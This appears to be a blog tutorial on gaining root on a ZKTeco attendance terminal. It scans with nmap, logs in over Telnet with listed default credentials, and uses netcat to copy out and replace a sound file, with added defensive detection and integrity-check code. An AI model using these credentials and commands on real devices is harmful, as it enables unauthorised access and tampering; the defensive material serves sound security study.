Hacking ZKTeco K40Pro (ZEM510) IoT Device

Hello Friends,

What is the very first thought that comes to your mind when you see an Attendance Machine??

Whether you are a student or a professional, the very first thought is: Why, why me, God... Was there even a need for these so-called Office Attendance Machines??!! The one thing that follows us like our shadow is not our soul mate, twin flame and all, but this Attendance machine... Chillax!! IoT devices can be hacked in minutes. Today we are going to hack into one such device: the ZKTeco Office Attendance Machine...

Welcome to the realm of Hacking... The future of hacking lies in IoT hacking. Just as the internet connects people, the Internet of Things connects devices and helps them communicate.

Today, we will gain access to this Attendance machine and change its normal behaviour.

IoT Hacking -ZKTeco Office Attendance Machine by Dhaiwat under guidance of Smit Sir

So, let's find out whether this "Smart" device is actually smart or not..? 😉 In just ten simple steps. Yes...!! You heard it right: in just ten steps we will hack into the system, and the smartness of the device will be at a crunch.. 😀

The first step is to scan the network and find the IP of the device. For this, you can use nmap or Zenmap.

Here we are using nmap. The attacker's IP is 192.168.1.58 and the victim's IP is 192.168.1.101.

Now we will do port scanning on the victim's IP. Port scanning is a technique through which we can find the open ports and target the victim.

Command: nmap -sV -p- 192.168.1.101 (victim's IP)

From the output of the above command, we found that the Telnet port is open, i.e. port no. 23.

Telnet port is open, i.e. port no. 23.
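The same scan is what a defender runs to find out which devices on a segment still expose Telnet. The following is an added example, not code from the original post: it parses nmap's "grepable" output (`-oG`) and lists the hosts with a given port open. The scan output embedded below is constructed to mirror the post's addresses; the service names and versions in it are sample values, not real fingerprints of the device.

```python
"""Added example (not from the original post): flag hosts that expose Telnet
in nmap "grepable" (-oG) output, so a network segment can be audited for
devices like this attendance machine. The sample output below is constructed."""
import re

# Constructed sample of `nmap -sV -p- -oG - 192.168.1.0/24` style output.
SAMPLE_GREPABLE = """\
# Nmap scan initiated (constructed sample)
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (65533)
Host: 192.168.1.101 ()\tStatus: Up
Host: 192.168.1.101 ()\tPorts: 23/open/tcp//telnet//Linux telnetd/, 4370/open/tcp//zkteco?///\tIgnored State: closed (65533)
Host: 192.168.1.58 ()\tPorts: 22/open/tcp//ssh//OpenSSH 9.2/\tIgnored State: closed (65534)
# Nmap done (constructed sample)
"""

# One -oG port entry is port/state/proto/owner/service/rpcinfo/version/ ;
# owner and rpcinfo are normally empty, which gives the double slashes.
PORT_ENTRY = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_grepable(text):
    """Return {host: [(port, state, proto, service, version), ...]}."""
    hosts = {}
    for line in text.splitlines():
        # Only "Host: ... Ports: ..." lines carry port data; "Status: Up" lines are skipped.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        entries = []
        for m in PORT_ENTRY.finditer(ports_field):
            port, state, proto, service, version = m.groups()
            entries.append((int(port), state, proto, service, version.strip()))
        hosts.setdefault(host, []).extend(entries)
    return hosts


def hosts_exposing(text, port=23):
    """Hosts with `port` open. Telnet (23) is cleartext and should not be reachable at all."""
    scan = parse_grepable(text)
    return sorted(h for h, entries in scan.items()
                  if any(p == port and state == "open" for p, state, *_ in entries))


if __name__ == "__main__":
    for host in hosts_exposing(SAMPLE_GREPABLE):
        print("Telnet exposed on", host)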

In the second step, we will try to connect using default passwords.

Connecting to Telnet using default passwords.

Here is a list of Telnet default passwords.. 😉

admin:admin

888:manage

manage:888

asp:test

888:asp

One of the combinations that worked for us is root:solokey.

The third step is to check our privileges.

Command to check the current user: id

The output of the above command is root.

Checking the privileges of the user.

Now, in the fourth step, we will look at the running processes to find one that is useful for us.

The command ps is used to list the running processes.

Here, we found the running processes.

Through this, we found an unusual process: /mnt/mtdblock/main

The fifth step is to get into /mnt/mtdblock.

We found the different configuration files.

In /mnt/mtdblock, we found options.cfg, which looks like a configuration file. What are we waiting for..?? Let's dig into it.

Command: cat file_name, here cat options.cfg

The sixth step is to dig into the configuration file.

The options.cfg file is important for us.

Here we found some public IPs, ports and user configurations.

It's time to play.

Command: cd wav

ls

In the seventh step, we found the wav sound files. These will help us further in changing the behaviour of the smart machine.

Number of wav files fetched.

Now, through netcat, we will transfer the E_0.wav file.

To do that, we start a netcat listener on port 4444 on the attacker's system and redirect its output into E_0.wav, because netcat only transfers the data in raw form; it does not create the file for us.

Here is the wav file we got from the victim's system: the monotonous sound of "Thank You"... :((

Command: ncat -lvnp 4444 > E_0.wav

The wav file which we will change is fetched.

Let's get rid of this boring "Thank You" sound.. Let's play with the machine..!!! 😉

Now, in the eighth step, we will send the file from the victim machine to the attacker's system. To do that, run the following command on the victim system, specifying E_0.wav as the input.

nc 192.168.1.58 4444 < E_0.wav

The file is fetched on the attacker's machine from the victim's machine.

Now that we have the file on the attacker's system, we will use the dir command to check the file size.

The size of the file is fetched.

So, now we will generate a custom wav file.. 😉

In step number nine, we generate the custom wav file. For that we will use a free online website to generate a wav file from text and then rename it to E_0.wav. Let's remove the original file from the victim machine using the rm command. Then we start a netcat listener on the victim machine on port 4444 and save the output of the listener in the wav file.

Command: nc -lp 4444 > E_0.wav

The tenth and final step is to send our new E_0.wav to the victim machine using the following command.

ncat 192.168.1.101 4444 < E_0.wav

The custom wav file is now hosted on the victim's machine.
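Every step of this walkthrough leaves a trace on the network: the repeated Telnet connections while default passwords are tried (step 2), the device pushing a file out to a high port on another host (step 8), and a host pushing a file into a port the device does not normally serve (step 10). The following is an added example, not code from the original post, showing how those three patterns can be picked out of connection records such as a firewall or NetFlow export. The records, the management host 192.168.1.10, and the device's expected service ports are all constructed or assumed for the example.

```python
"""Added example (not from the original post): detect the Telnet credential
guessing (step 2) and the netcat file transfers (steps 7 to 10) from
connection-level records such as a firewall log or NetFlow export.
All records below are constructed to mirror the post's addresses and ports."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Flow:
    ts: int         # seconds since epoch (constructed)
    src: str        # host that opened the connection
    dst: str
    dport: int
    bytes_out: int  # bytes sent by src


DEVICE = "192.168.1.101"        # the attendance machine from the post
ADMIN_HOSTS = {"192.168.1.10"}  # assumed: the only host allowed to use Telnet to the device
SERVICE_PORTS = {23, 4370}      # assumed: ports the device is expected to serve

# Constructed flow records reproducing the walkthrough.
FLOWS = [
    Flow(1000, "192.168.1.10", DEVICE, 23, 512),         # admin host, legitimate session
    Flow(2000, "192.168.1.58", DEVICE, 23, 80),          # short Telnet attempts: default passwords
    Flow(2005, "192.168.1.58", DEVICE, 23, 80),
    Flow(2010, "192.168.1.58", DEVICE, 23, 80),
    Flow(2015, "192.168.1.58", DEVICE, 23, 2048),        # the one that worked
    Flow(2300, DEVICE, "192.168.1.58", 4444, 31000),     # step 8: device pushes E_0.wav out
    Flow(2600, "192.168.1.58", DEVICE, 4444, 28000),     # step 10: replacement pushed in
    Flow(2700, "192.168.1.20", DEVICE, 4370, 300),       # ordinary sync traffic (assumed port)
]


def detect(flows, device=DEVICE, admin_hosts=ADMIN_HOSTS,
           service_ports=SERVICE_PORTS, guess_threshold=3):
    """Return a list of (alert_kind, ...) tuples for the suspicious patterns."""
    alerts = []
    telnet_by_src = defaultdict(int)
    flagged_telnet_srcs = set()
    for f in flows:
        if f.dst == device and f.dport == 23:
            telnet_by_src[f.src] += 1
            if f.src not in admin_hosts and f.src not in flagged_telnet_srcs:
                flagged_telnet_srcs.add(f.src)
                alerts.append(("telnet_from_unapproved_host", f.src))
        # The device itself opening a connection to a high port and sending data:
        # an embedded attendance terminal has no business doing that (step 8).
        if f.src == device and f.dport >= 1024 and f.bytes_out > 0:
            alerts.append(("device_outbound_transfer", f"{f.dst}:{f.dport}", f.bytes_out))
        # Inbound connection accepted on a port the device does not serve:
        # someone started an ad-hoc listener on it (steps 9 and 10).
        if f.dst == device and f.dport not in service_ports:
            alerts.append(("device_unexpected_listener", f"{f.src}->{f.dport}", f.bytes_out))
    # Many Telnet connections from one source in the window: credential guessing (step 2).
    for src, n in telnet_by_src.items():
        if n >= guess_threshold:
            alerts.append(("telnet_credential_guessing", src, n))
    return alerts


if __name__ == "__main__":
    for alert in detect(FLOWS):
        print(alert)
```

On a real deployment the flow list would come from the firewall or switch export, and the admin host set and service ports from the device inventory; the thresholds are deliberately low here because an attendance terminal should see almost no interactive logins at all.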

And bingo, we have changed the sound of the Attendance machine.

Impact of the IoT device hacking

  • In this case, we directly get root access, meaning we can take full control over the device.
  • If the attacker reaches the router's IP through a so-called smart device like a camera, attendance machine or Smart Television, he can easily gain the router's credentials through a rainbow table tool.
  • Once the attacker has access to the router, the whole network is under the attacker's control.

Solution to keep intruders away

  • If you are using the same device at your school, university or workplace, the solution to keep hackers/attackers away is to change the default Telnet password.
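Changing the password stops the entry point; it does not tell you whether a prompt file has already been swapped. The following is an added example, not code from the original post: a file-integrity baseline over the device's prompt directory, so a replaced E_0.wav like the one planted in the final step shows up as a modified file on the next comparison. The directory, file names and contents are constructed here; on the real device the directory would be the /mnt/mtdblock/wav named in the post, and the baseline should be kept off the device.

```python
"""Added example (not from the original post): a file-integrity baseline for
the device's prompt directory, so a swapped E_0.wav (the change made in the
final step) is noticed. Paths and sample contents are constructed; on the
real device the directory would be /mnt/mtdblock/wav as named in the post."""
import hashlib
import json
import os
import tempfile


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large prompt files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(directory):
    """Map each file (relative path) under `directory` to its SHA-256 and size."""
    baseline = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, directory)
            baseline[rel] = {"sha256": sha256_of(full), "size": os.path.getsize(full)}
    return baseline


def compare(baseline, directory):
    """Report files whose hash changed, files that vanished, and files that appeared."""
    current = build_baseline(directory)
    return {
        "modified": sorted(p for p in baseline
                           if p in current and current[p]["sha256"] != baseline[p]["sha256"]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def demo():
    """Reproduce the post's tampering on a constructed copy of the wav directory."""
    with tempfile.TemporaryDirectory() as wav_dir:
        # Constructed placeholders standing in for the device's prompt files.
        for name in ("E_0.wav", "E_1.wav"):
            with open(os.path.join(wav_dir, name), "wb") as fh:
                fh.write(b"RIFF" + name.encode() + b"\x00" * 64)
        baseline = build_baseline(wav_dir)
        # Steps 9 and 10 of the post: original removed, a custom file written under the same name.
        os.remove(os.path.join(wav_dir, "E_0.wav"))
        with open(os.path.join(wav_dir, "E_0.wav"), "wb") as fh:
            fh.write(b"RIFF" + b"custom prompt (constructed)" + b"\x00" * 64)
        return compare(baseline, wav_dir)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice the baseline would be produced once from a known-good device (for instance with `build_baseline` run over the directory and the result saved as JSON on the management host), and `compare` run on a schedule; any entry under "modified" or "added" in the prompt directory is worth an immediate look, since nothing legitimate writes there during normal operation.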

Note: "This is for educational purposes only." Exploiting this can land you in legal trouble. Always choose to learn and help others rather than landing in any kind of felony.